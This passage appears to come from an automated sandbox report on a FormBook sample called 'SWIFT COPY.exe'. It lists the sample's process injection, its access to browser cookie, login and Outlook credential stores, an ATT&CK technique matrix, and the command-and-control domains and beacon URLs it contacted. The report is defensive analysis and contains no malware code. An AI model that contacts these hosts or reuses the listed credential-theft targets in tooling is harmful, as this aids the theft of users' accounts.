                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 3.2.SWIFT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.SWIFT COPY.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.3579225872.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2223687657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3579265567.0000000002C60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2224196116.0000000000E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3578299368.0000000002870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3579400562.0000000002390000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2227839219.0000000001800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\finger.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 3.2.SWIFT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.SWIFT COPY.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.3579225872.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2223687657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3579265567.0000000002C60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2224196116.0000000000E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3578299368.0000000002870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3579400562.0000000002390000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2227839219.0000000001800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading
                412
                Process Injection
                1
                Masquerading
                1
                OS Credential Dumping
                121
                Security Software Discovery
                Remote Services1
                Email Collection
                1
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                Abuse Elevation Control Mechanism
                1
                Disable or Modify Tools
                LSASS Memory2
                Process Discovery
                Remote Desktop Protocol1
                Archive Collected Data
                3
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading
                41
                Virtualization/Sandbox Evasion
                Security Account Manager41
                Virtualization/Sandbox Evasion
                SMB/Windows Admin Shares1
                Data from Local System
                4
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
                Process Injection
                NTDS2
                File and Directory Discovery
                Distributed Component Object ModelInput Capture4
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information
                LSA Secrets113
                System Information Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism
                Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information
                DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                Software Packing
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                DLL Side-Loading
                /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1578068 Sample: SWIFT COPY.exe Startdate: 19/12/2024 Architecture: WINDOWS Score: 100 31 www.pbfgm.xyz 2->31 33 www.smalleyes.icu 2->33 35 2 other IPs or domains 2->35 45 Suricata IDS alerts for network traffic 2->45 47 Multi AV Scanner detection for submitted file 2->47 49 Yara detected FormBook 2->49 53 4 other signatures 2->53 10 SWIFT COPY.exe 3 2->10         started        signatures3 51 Performs DNS queries to domains with low reputation 31->51 process4 file5 29 C:\Users\user\AppData\...\SWIFT COPY.exe.log, ASCII 10->29 dropped 65 Injects a PE file into a foreign processes 10->65 14 SWIFT COPY.exe 10->14         started        signatures6 process7 signatures8 67 Maps a DLL or memory area into another process 14->67 17 XwGiOcrCkQ.exe 14->17 injected process9 signatures10 43 Found direct / indirect Syscall (likely to bypass EDR) 17->43 20 finger.exe 13 17->20         started        process11 signatures12 55 Tries to steal Mail credentials (via file / registry access) 20->55 57 Tries to harvest and steal browser information (history, passwords, etc) 20->57 59 Modifies the context of a thread in another process (thread injection) 20->59 61 3 other signatures 20->61 23 XwGiOcrCkQ.exe 20->23 injected 27 firefox.exe 20->27         started        process13 dnsIp14 37 www.pbfgm.xyz 104.21.86.111, 49763, 80 CLOUDFLARENETUS United States 23->37 39 www.smalleyes.icu 134.122.191.187, 49863, 49869, 49875 BCPL-SGBGPNETGlobalASNSG United States 23->39 41 www.elinor.club 194.58.112.174, 49825, 49831, 49836 AS-REGRU Russian Federation 23->41 63 Found direct / indirect Syscall (likely to bypass EDR) 23->63 signatures15

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                SWIFT COPY.exe35%VirustotalBrowse
                SWIFT COPY.exe63%ReversingLabsWin32.Backdoor.FormBook
                SWIFT COPY.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://api.libertyreserve.com/beta/xml/history.aspxS0%Avira URL Cloudsafe
                http://www.pbfgm.xyz/fjd6/?Ir=beVfoldUF3/aok0FdWpvJC8HGsWBcAhapzZJ64FbAFAGDRV4pYz0MK1VY/vkdFXAOWskmP9Sk8tWhxHaAHTK2FUvh8SZisD6hpiODREZagit+S+U5/mb9Z4=&M8Gl=KPotmx2p0n0%Avira URL Cloudsafe
                https://api.libertyreserve.com/beta/xml/balance.aspx0%Avira URL Cloudsafe
                https://api.libertyreserve.com/beta/xml/transfer.aspx0%Avira URL Cloudsafe
                https://api.libertyreserve.com/beta/xml/accountname.aspx0%Avira URL Cloudsafe
                http://www.ascendercorp.com/typedesigners.html0%Avira URL Cloudsafe
                http://www.smalleyes.icu/s6zh/?Ir=3lPbUJ/4EMFnMU367dk2ybPqIMylLyFhjqRifsXJf3a7S0x2d/GglTvwUDIMpGCMSyBp4aVeuGLlN5/zkDRsMKMrA2+vlNwKuHc+NKCv2NtQORSHn8saFjw=&M8Gl=KPotmx2p0n0%Avira URL Cloudsafe
                http://www.smalleyes.icu/s6zh/0%Avira URL Cloudsafe
                http://www.elinor.club/1ne4/?Ir=Xmf7DtAQ/BnKPHUir9F/DJAWe/lobbRTq1FD1Ek4pNpfKYXlmyGrxyMDIrQcVSlaQ+EmZyFY/HlqglCDghJI5jUfoqKY7Fz8p0/9FqW//8AiMTO0G3RJpL4=&M8Gl=KPotmx2p0n0%Avira URL Cloudsafe
                http://www.smalleyes.icu0%Avira URL Cloudsafe
                http://elinor.club/1ne4/?Ir=Xmf7DtAQ/BnKPHUir9F/DJAWe/lobbRTq1FD1Ek4pNpfKYXlmyGrxyMDIrQcVSlaQ0%Avira URL Cloudsafe
                https://sci.libertyreserve.com/0%Avira URL Cloudsafe
                https://api.libertyreserve.com/beta/xml/0%Avira URL Cloudsafe
                https://api.libertyreserve.com/beta/xml/history.aspx0%Avira URL Cloudsafe
                http://www.elinor.club/1ne4/0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                www.smalleyes.icu
                134.122.191.187
                truetrue
                  unknown
                  www.pbfgm.xyz
                  104.21.86.111
                  truetrue
                    unknown
                    www.elinor.club
                    194.58.112.174
                    truetrue
                      unknown
                      www.phdcoach.pro
                      unknown
                      unknownfalse
                        unknown
                        NameMaliciousAntivirus DetectionReputation
                        http://www.smalleyes.icu/s6zh/?Ir=3lPbUJ/4EMFnMU367dk2ybPqIMylLyFhjqRifsXJf3a7S0x2d/GglTvwUDIMpGCMSyBp4aVeuGLlN5/zkDRsMKMrA2+vlNwKuHc+NKCv2NtQORSHn8saFjw=&M8Gl=KPotmx2p0ntrue
                        • Avira URL Cloud: safe
                        unknown
                        http://www.elinor.club/1ne4/?Ir=Xmf7DtAQ/BnKPHUir9F/DJAWe/lobbRTq1FD1Ek4pNpfKYXlmyGrxyMDIrQcVSlaQ+EmZyFY/HlqglCDghJI5jUfoqKY7Fz8p0/9FqW//8AiMTO0G3RJpL4=&M8Gl=KPotmx2p0ntrue
                        • Avira URL Cloud: safe
                        unknown
                        http://www.smalleyes.icu/s6zh/true
                        • Avira URL Cloud: safe
                        unknown
                        http://www.pbfgm.xyz/fjd6/?Ir=beVfoldUF3/aok0FdWpvJC8HGsWBcAhapzZJ64FbAFAGDRV4pYz0MK1VY/vkdFXAOWskmP9Sk8tWhxHaAHTK2FUvh8SZisD6hpiODREZagit+S+U5/mb9Z4=&M8Gl=KPotmx2p0ntrue
                        • Avira URL Cloud: safe
                        unknown
                        http://www.elinor.club/1ne4/true
                        • Avira URL Cloud: safe
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        https://duckduckgo.com/chrome_newtabfinger.exe, 00000007.00000003.2415607709.00000000079E8000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          http://www.fontbureau.com/designersGSWIFT COPY.exe, 00000000.00000002.1891816034.00000000091F2000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://duckduckgo.com/ac/?q=finger.exe, 00000007.00000003.2415607709.00000000079E8000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              http://www.fontbureau.com/designers/?SWIFT COPY.exe, 00000000.00000002.1891816034.00000000091F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.founder.com.cn/cn/bTheSWIFT COPY.exe, 00000000.00000002.1891816034.00000000091F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.fontbureau.com/designers?SWIFT COPY.exe, 00000000.00000002.1891816034.00000000091F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.tiro.comSWIFT COPY.exe, 00000000.00000002.1891816034.00000000091F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=finger.exe, 00000007.00000003.2415607709.00000000079E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        http://www.fontbureau.com/designersSWIFT COPY.exe, 00000000.00000002.1891816034.00000000091F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://api.libertyreserve.com/beta/xml/history.aspxSSWIFT COPY.exe, 00000000.00000002.1886186642.0000000002B79000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.goodfont.co.krSWIFT COPY.exe, 00000000.00000002.1891816034.00000000091F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.sajatypeworks.comSWIFT COPY.exe, 00000000.00000002.1891816034.00000000091F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://www.typography.netDSWIFT COPY.exe, 00000000.00000002.1891816034.00000000091F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://www.founder.com.cn/cn/cTheSWIFT COPY.exe, 00000000.00000002.1891816034.00000000091F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.galapagosdesign.com/staff/dennis.htmSWIFT COPY.exe, 00000000.00000002.1891816034.00000000091F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://api.libertyreserve.com/beta/xml/transfer.aspxSWIFT COPY.exefalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfinger.exe, 00000007.00000003.2415607709.00000000079E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.galapagosdesign.com/DPleaseSWIFT COPY.exe, 00000000.00000002.1891816034.00000000091F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://www.ascendercorp.com/typedesigners.htmlSWIFT COPY.exe, 00000000.00000002.1891587045.0000000008060000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.fonts.comSWIFT COPY.exe, 00000000.00000002.1891816034.00000000091F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://www.sandoll.co.krSWIFT COPY.exe, 00000000.00000002.1891816034.00000000091F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://www.urwpp.deDPleaseSWIFT COPY.exe, 00000000.00000002.1891816034.00000000091F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://www.zhongyicts.com.cnSWIFT COPY.exe, 00000000.00000002.1891816034.00000000091F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://www.sakkal.comSWIFT COPY.exe, 00000000.00000002.1891816034.00000000091F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://api.libertyreserve.com/beta/xml/accountname.aspxSWIFT COPY.exefalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://api.libertyreserve.com/beta/xml/balance.aspxSWIFT COPY.exefalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://elinor.club/1ne4/?Ir=Xmf7DtAQ/BnKPHUir9F/DJAWe/lobbRTq1FD1Ek4pNpfKYXlmyGrxyMDIrQcVSlaQfinger.exe, 00000007.00000002.3579976646.0000000003D98000.00000004.10000000.00040000.00000000.sdmp, XwGiOcrCkQ.exe, 00000008.00000002.3579571028.00000000039A8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://www.apache.org/licenses/LICENSE-2.0SWIFT COPY.exe, 00000000.00000002.1891816034.00000000091F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://www.fontbureau.comSWIFT COPY.exe, 00000000.00000002.1891816034.00000000091F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icofinger.exe, 00000007.00000003.2415607709.00000000079E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://www.smalleyes.icuXwGiOcrCkQ.exe, 00000008.00000002.3579246443.0000000002E00000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://api.libertyreserve.com/beta/xml/history.aspxSWIFT COPY.exefalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=finger.exe, 00000007.00000003.2415607709.00000000079E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://www.ecosia.org/newtab/finger.exe, 00000007.00000003.2415607709.00000000079E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://api.libertyreserve.com/beta/xml/SWIFT COPY.exefalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://www.carterandcone.comlSWIFT COPY.exe, 00000000.00000002.1891816034.00000000091F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://ac.ecosia.org/autocomplete?q=finger.exe, 00000007.00000003.2415607709.00000000079E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://www.fontbureau.com/designers/cabarga.htmlNSWIFT COPY.exe, 00000000.00000002.1891816034.00000000091F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://www.founder.com.cn/cnSWIFT COPY.exe, 00000000.00000002.1891816034.00000000091F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://www.fontbureau.com/designers/frere-user.htmlSWIFT COPY.exe, 00000000.00000002.1891816034.00000000091F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://www.jiyu-kobo.co.jp/SWIFT COPY.exe, 00000000.00000002.1891816034.00000000091F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://www.fontbureau.com/designers8SWIFT COPY.exe, 00000000.00000002.1891816034.00000000091F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://sci.libertyreserve.com/SWIFT COPY.exefalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=finger.exe, 00000007.00000003.2415607709.00000000079E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            • No. of IPs < 25%
                                                                                            • 25% < No. of IPs < 50%
                                                                                            • 50% < No. of IPs < 75%
                                                                                            • 75% < No. of IPs
                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                            134.122.191.187
                                                                                            www.smalleyes.icuUnited States
                                                                                            64050BCPL-SGBGPNETGlobalASNSGtrue
                                                                                            104.21.86.111
                                                                                            www.pbfgm.xyzUnited States
                                                                                            13335CLOUDFLARENETUStrue
                                                                                            194.58.112.174
                                                                                            www.elinor.clubRussian Federation
                                                                                            197695AS-REGRUtrue
                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                            Analysis ID:1578068
                                                                                            Start date and time:2024-12-19 08:38:50 +01:00
                                                                                            Joe Sandbox product:CloudBasic
                                                                                            Overall analysis duration:0h 10m 7s
                                                                                            Hypervisor based Inspection enabled:false
                                                                                            Report type:full
                                                                                            Cookbook file name:default.jbs
